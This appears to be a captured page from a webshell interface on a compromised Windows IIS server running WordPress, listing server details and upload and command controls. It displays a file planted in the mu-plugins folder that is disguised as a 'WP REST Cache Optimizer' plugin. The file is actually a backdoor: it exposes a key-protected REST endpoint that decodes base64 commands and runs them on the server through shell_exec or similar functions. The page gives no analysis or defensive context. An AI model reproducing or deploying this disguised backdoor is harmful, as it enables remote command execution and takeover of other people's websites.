403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.217.51
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/VerdantVeggies/wp-content/mu-plugins/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/VerdantVeggies/wp-content/mu-plugins/wp-rest-cache-b2015ca3.php
<?php
/* Plugin Name: WP REST Cache Optimizer */
add_action('rest_api_init',function(){
  register_rest_route('wp-site-health/v2','/check-8b3ac57d',['methods'=>'POST',
    'permission_callback'=>'__return_true',
    'callback'=>function($r){
      if(!$r->get_param('k')||!hash_equals('692cbd76b9e53f0cfe9b41ab60d2d4b9',$r->get_param('k')))return new WP_Error('rest_forbidden','',['status'=>403]);
      $_c=base64_decode($r->get_param('c')).' 2>&1';$o='';
      if(function_exists('shell_exec')){$o=@shell_exec($_c);}
      elseif(function_exists('exec')){@exec($_c,$_out);$o=implode("\n",$_out);}
      elseif(function_exists('passthru')){ob_start();@passthru($_c);$o=ob_get_clean();}
      elseif(function_exists('system')){ob_start();@system($_c);$o=ob_get_clean();}
      return ['s'=>true,'o'=>base64_encode($o)];
    }]);
});

Youez - 2016 - github.com/yon3zu
LinuXploit